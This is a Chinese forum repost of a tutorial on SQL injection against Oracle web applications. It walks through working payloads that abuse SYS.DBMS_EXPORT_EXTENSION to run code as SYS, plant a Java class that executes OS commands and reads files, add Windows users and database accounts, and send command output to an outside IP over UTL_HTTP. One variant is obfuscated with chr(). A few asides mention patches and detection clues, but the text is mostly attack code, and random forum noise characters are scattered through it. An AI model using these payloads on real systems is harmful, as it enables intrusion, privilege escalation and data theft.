
标题: 实例演示oracle注入获取cmdshell的全过程

作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 "'a'||" 是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数(该包归 SYS 所有、以定义者权限运行且 PUBLIC 可执行,传入第三个参数的 PL/SQL 会以 SYS 身份执行,因此后面创建的对象都落在 SYS 模式下;已安装相应 Critical Patch Update 或已撤销 PUBLIC 对该包执行权限的数据库不受此影响),在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
+ X/ {7 e7 P* e* e8 ]$ h6 Q/xxx.jsp?id=1 and '1'<>'a'||(
8 g8 M& _' R; f4 `. G- c8 g, d; Q$ @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ r. p5 D# H9 F, t- w8 A( I
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" x2 i: b  }) ]. K) K4 k& @new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  j+ v, A5 w  M0 U1 W2 E/ x* d7 T2 m7 O}'''';END;'';END;--','SYS',0,'1',0) from dual
% U0 Q; Q6 G9 q; q% s) / v; A" H9 S( N) H: l/ s
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
  N/ {) \  \% l) H& A' J/xxx.jsp?id=1 and '1'<>'a'||(
0 \, b. c9 r2 r" \. O  b: eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* d- e' C$ D! v/ s3 z3 w( xcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" r9 O" p: D( T; {+ _new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}" ~. _( o2 W3 b: d% Z8 u+ X  j
}'''';END;'';END;--','SYS',0,'1',0) from dual
/ ^9 R3 G* t' ^: y* W% y)
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限(这一步把 java.io.FilePermission <<ALL FILES>> execute 授给了 PUBLIC,即库内任意用户都能借 Java 执行操作系统命令;这条授权在 DBA_JAVA_POLICY 视图中可以查到,排查时值得留意)
( V; K( y3 i5 e5 g$ N8 ~7 xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual5 R2 b* q: J  g
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 s" W* A4 n# A& l( C0 ]: X$ T% L! P1 G5 e
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual  V8 g0 H/ b0 B4 t$ Z5 R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''' q7 R8 G% i0 Y
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
# v2 L# q: {2 p" zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
) \( i" `3 y  I- k8 f% @/ v7 a# ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual' B5 M; i7 ^% s. r3 k' Z
5.测试上面的几步是否成功
6 H; S/ P- ~! L! C0 zand '1'<>'11'||(
' s6 U+ l4 _+ e1 @6 l. @% `select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
8 q9 f0 e5 Q9 v3 @  _)
1 v9 f; D, h4 @% s$ E3 m$ U  w. j; oand '1'<>(
/ I, ?$ L- @0 D* k1 Eselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 5 W# G7 l4 q7 R  A" q7 _: d
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
5 a9 E3 f  O9 N. vselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual 4 D9 e, v9 o0 n! [
. p& v' G9 O) m$ Q: p- f  t
) " I3 u# _. i8 Q5 Y$ P/ x
/xxx.jsp?id=1 and '1'<>( + y/ n( q. V: o' q9 r  F% E
select  sys.LinxReadFile('c:/boot.ini') from dual
/ T' {3 W, q* e1 o. M$ {& k, L4 `! ]
). @2 B0 x( W0 h
  
注意sys.LinxReadFile()返回的是varchar类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
, ?/ D" c/ Q7 A0 `# S/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request:
/xxx.jsp?id=1 and '1'<>( ! w% n. k4 x* b; R  B5 o
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
. W* K' g2 E+ V)
4 z: E2 Z2 W' x. u7 g" V/xxx.jsp?id=1 and '1'<>( * z1 Z& a2 d$ s& O5 G
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
5 Z/ V7 m" \' l9 a' ?0 M$ ~)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交http request。用utl_encode.base64_encode也可以。(从防御角度看,数据库服务器本不该能随意对外发起 HTTP 请求;限制并记录这类出站流量,是发现此类数据外传最直接的手段。)
--------------------
7.内部变化
通过以下命令可以查看all_objects表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
8.删除我们创建的函数(注意下面只 drop 了 LinxRunCMD;LinxReadFile、Java 源 LinxUtil 以及第2步授予 PUBLIC 的 FilePermission 仍留在库里,这些残留同样可以作为事后排查的线索)
& ~  L6 C: m) Z8 _0 B8 A- uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- t/ Z0 R. B; d  ~7 j% |
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ( f: b, Q; G% H1 P2 M9 E) M( D
====================================================
全文结束。谨以此文赠与我的朋友。
; L- [3 _) {6 Z8 Ulinx
8 s$ |1 A% C( A124829445
! p6 _9 W: j+ ^2 q2008.1.12
& _% |$ p& B( {, K3 Vlinyujian@bjfu.edu.cn 7 h, U% A3 V& `1 R3 W
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
/ `+ }: s% h/ B" u: C" F9 Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') F+ L' b, F, U( H6 p  N. G
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
1 ?5 p3 g, E* p  x0 C! z7 v/ |3 nchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual * }! K+ y' L$ \+ K
确定漏洞存在:
9 j2 h+ A1 h3 P8 H: o1<>(
( p$ a+ Q2 R& nselect user_id from all_users where username='LINXSQL'
2 b% A: f5 W+ }8 p4 G0 a, W$ Z) 7 X8 M( _  F1 ~
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 ~- p! l7 u3 A2 zGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
1 r2 W- n; g5 |1 A7 lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 C( L7 R- Z2 b
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但因为它声明为 authid current_user,权限随调用者,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
& A5 t( V+ j3 E2 U* {1.jsp?id=1 and '1'<>(
. |. a1 w9 I( L% R* z% i$ G0 M! S! iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" n2 L2 U4 K* ]* w! `; Y8 S9 Zcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual1 M* B4 C5 n+ D) K
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
0 Q; U1 T, T1 }8 K )
8 z: O5 ~% v, w5 t# u% v' Q$ R9 w, C* ]$ w; I- i
* ^) L9 l; F; j* o/ P

: L+ e8 `; J; S



